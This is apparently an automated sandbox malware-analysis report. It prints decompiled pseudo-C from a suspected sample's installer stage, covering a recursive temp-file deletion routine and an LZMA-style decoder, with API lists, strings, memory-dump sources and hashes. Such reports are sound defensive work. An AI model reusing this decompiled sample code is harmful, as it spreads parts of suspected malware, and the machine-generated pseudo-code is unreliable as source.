						E00405E22(_t68);
					} else {
						lstrcatW(0x425710, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425710,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406507(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BCB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405569(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E00405569(0xfffffff1, _t68);
											E004062C7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C13(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425710 - 0x5c;
					if( *0x425710 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040683D(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DD6(_t68);
							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405569(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405569(0xfffffff1, _t68);
							return E004062C7(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c1d
0x00405c22
0x00405c2b
0x00405c2e
0x00405c36
0x00405c39
0x00405c3c
0x00405c44
0x00405c46
0x00405c47
0x00000000
0x00405c47
0x00405c52
0x00405c55
0x00405c55
0x00405c55
0x00405c59
0x00405c6c
0x00405c73
0x00405c78
0x00405c7c
0x00405c8c
0x00405c7e
0x00405c84
0x00405c84
0x00405c91
0x00405c95
0x00405ca1
0x00405ca7
0x00405cac
0x00405cb2
0x00405cbd
0x00405cc3
0x00405cc5
0x00405cc8
0x00405d72
0x00405d72
0x00405d76
0x00405d78
0x00405d78
0x00405d78
0x00405d78
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cce
0x00405cce
0x00405cce
0x00405cd6
0x00405cf6
0x00405cfe
0x00405d03
0x00405d0a
0x00405d25
0x00405d2a
0x00405d2c
0x00405d50
0x00405d2e
0x00405d2e
0x00405d31
0x00405d45
0x00405d33
0x00405d36
0x00405d3e
0x00405d3e
0x00405d31
0x00405d0c
0x00405d12
0x00405d14
0x00405d1a
0x00405d1a
0x00405d14
0x00000000
0x00405d0a
0x00405cd8
0x00405ce0
0x00000000
0x00000000
0x00405ce2
0x00405cea
0x00000000
0x00000000
0x00405cec
0x00405cf4
0x00000000
0x00000000
0x00000000
0x00405d55
0x00405d5d
0x00405d63
0x00405d63
0x00405d6c
0x00000000
0x00405d6c
0x00405c97
0x00405c9f
0x00000000
0x00000000
0x00000000
0x00405c5b
0x00405c5b
0x00405c5d
0x00405d7d
0x00405d7f
0x00405d82
0x00405dd3
0x00405dd3
0x00405dd3
0x00405d84
0x00405d87
0x00405d92
0x00405d97
0x00405d99
0x00000000
0x00000000
0x00405d9c
0x00405da8
0x00405dad
0x00405daf
0x00000000
0x00405dca
0x00405db1
0x00405db4
0x00000000
0x00000000
0x00405db9
0x00000000
0x00405dc0
0x00405d89
0x00405d89
0x00000000
0x00405d89
0x00405c63
0x00405c66
0x00000000
0x00000000
0x00000000
0x00405c66

APIs

DeleteFileW.KERNELBASE(?,?,76D23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,76D23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,76D23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNEL32(00000000), ref: 00405D6C

Strings

\*.*, xrefs: 00405C7E
., xrefs: 00405CE2
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C20
., xrefs: 00405CCE

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 033AFAFD Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Kt#O, xrefs: 033AFEDE
xpQ, xrefs: 033AFC59

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Kt#O$xpQ
API String ID: 0-3880684980
Opcode ID: 7466ab36c26c1daf837aa3e4f598e59e070bd6cbe99cad71d50182fe16655d18
Instruction ID: b5284fea889a49be326ab418149c8674d521163be9d3bd503457dc456cecb454
Opcode Fuzzy Hash: 7466ab36c26c1daf837aa3e4f598e59e070bd6cbe99cad71d50182fe16655d18
Instruction Fuzzy Hash: 1CF14B719182EA9BDB36CEF898993DE7FB59F42330F58854DD888AB587E3B04502C741

Uniqueness

Uniqueness Score: -1.00%

Function 033AFC91 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

Kt#O, xrefs: 033AFEDE
xpQ, xrefs: 033AFC59

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Kt#O$xpQ
API String ID: 0-3880684980
Opcode ID: f880c01f8a637231bf9103fdd58b94e10773ac326339e283990251da7ae9f828
Instruction ID: f7e272eaab12ad1a6b5616678bb69c3e84770d19c4588c1e3353b5322cbe07aa
Opcode Fuzzy Hash: f880c01f8a637231bf9103fdd58b94e10773ac326339e283990251da7ae9f828
Instruction Fuzzy Hash: 0CA1BD729042998BCF39CEB8CC887DE7BB69F45320F59445EDC88EFA42E37489428751

Uniqueness

Uniqueness Score: -1.00%

Function 033AFC1E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 288libraryserviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097
LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Strings

Kt#O, xrefs: 033AFEDE
xpQ, xrefs: 033AFC59

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleLibraryLoadService
String ID: Kt#O$xpQ
API String ID: 2142486359-3880684980
Opcode ID: c3ae0200334b0d4f07177ba8673c0025711f438686626f4a682d3e359c068d0c
Instruction ID: 781d26d61c151958c4622e2883d72cff914fdb93e146c3fe68b5f4d792f9fa98
Opcode Fuzzy Hash: c3ae0200334b0d4f07177ba8673c0025711f438686626f4a682d3e359c068d0c
Instruction Fuzzy Hash: AEA19D729042D98BCF39CEB88C887DE7BB69F45320F59445ADC89EFA42E37489428751

Uniqueness

Uniqueness Score: -1.00%

Function 033B61A9 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 215libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Strings

pB^, xrefs: 033B624D
}4C, xrefs: 033B621C

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: pB^$}4C
API String ID: 1029625771-2927481708
Opcode ID: 8a53b6c5d13e619fc299abb48af1e3810f8bd77c837714709b3c0ceb7718be7b
Instruction ID: 6748c7dad99c257b804a67ada69baa28ea2dc2824ea0890ac4811679908d21da
Opcode Fuzzy Hash: 8a53b6c5d13e619fc299abb48af1e3810f8bd77c837714709b3c0ceb7718be7b
Instruction Fuzzy Hash: 77812275A053899FDB34CE698DE27EA77F6AF59300F88012BCE4E8BA45C7309940CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406BFE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
